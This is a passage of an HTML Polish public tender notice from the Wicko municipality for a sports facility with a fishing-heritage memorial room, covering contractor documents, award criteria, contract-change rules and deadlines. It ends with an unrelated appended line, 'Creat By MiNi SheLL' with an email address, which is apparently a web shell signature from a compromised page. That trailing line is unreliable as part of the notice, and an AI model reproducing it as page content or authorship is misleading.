<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>W sytuacji gdy Wykonawca, wykazując spełnianie warunków udziału w postępowaniu                 o których mowa w art. 22 ust. 1 ustawy PZP i które zamawiający określił szczegółowo                   w rozdz. 5 pkt 5.1. SIWZ,  polega na zasobach innych podmiotów na zasadach określonych w art. 26 ust. 2b ustawy, zobowiązany jest udowodnić, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania do dyspozycji Wykonawcy niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia .</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Na podstawie art. 144 ust. 1 ustawy Prawo zamówień publicznych, Zamawiający przewiduje możliwość dokonania istotnych zmian postanowień umowy zawartej z wybranym Wykonawcą                w następujących przypadkach :
   - zmiany przepisów prawnych, w tym zmiany stawki podatku od towarów i usług mającej zastosowanie do przedmiotu umowy,
       - konieczności zmian zakresu dokumentacji projektowej, niewykraczającej poza zakres przedmiotu zamówienia, podyktowanych m.in.  zwiększeniem bezpieczeństwa wykonywanych robót, zapobieżeniem strat dla Zamawiającego, uzyskaniem założonego efektu użytkowego, wystąpieniem wad ukrytych w dokumentacji projektowej ujawnionych podczas  realizacji robót,
o ile te powodują konieczność zmiany  wysokości lub  sposobu  spełnienia świadczeń stron. 
2. Zmiana terminów realizacji zamówienia możliwa jest wyłącznie jeżeli niedotrzymanie pierwotnego terminu stanowi konsekwencję: 
1) okoliczności niezależnych od Wykonawcy, których nie można było przewidzieć w czasie podpisania umowy, 
2) przyczyn zależnych od Zamawiającego, 
3) zlecenia robót dodatkowych, 
4) działania siły wyższej. 
3. Ciężar dowodu w zakresie ustalenia przyczyn niezachowania terminów spoczywa na Stronie niniejszej umowy wnioskującej o zmianę. 
4. Warunki atmosferyczne nie będą traktowane jako siła wyższa, chyba że ich działanie było nadzwyczajne i miało istotny wpływ na wykonanie zadania.
5. W żadnym wypadku postanowień p-tów  1-2 nie należy interpretować jako udzielenie dowolnej ze stron  roszczenia do żądania zmiany umowy, a jedynie możliwość dokonania zmiany umowy. 
6. Każda zmiana umowy musi być dokonana na piśmie w formie aneksu pod rygorem nieważności oraz   wymaga zgody drugiej strony.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.wicko.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy w Wicku, Wicko 60, 84-352 Wicko.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 26.10.2012 godzina 10:00, miejsce: Sekretariat Urzędu Gminy w Wicku - pokój Nr 8 na parterze, Wicko 60, 84-352 Wicko.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt pn. Budowa zaplecza sportowego z izbą pamięci, jako obiektu upamiętniającego znaczenie i dorobek braci rybackiej żyjącej w miejscowości Żarnowska  realizowanego ze środków Unii Europejskiej  w ramach  Programu Operacyjnego Zrównoważony rozwój sektora rybołówstwa i nadbrzeżnych obszarów rybackich 2007-2013 ( środek 4.1. Rozwój obszarów zależnych od rybactwa z wyłączeniem realizacji operacji polegających na funkcjonowaniu lokalnej grupy rybackiej (LGR) oraz nabywaniu umiejętności i aktywizacji lokalnych społeczności ).</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com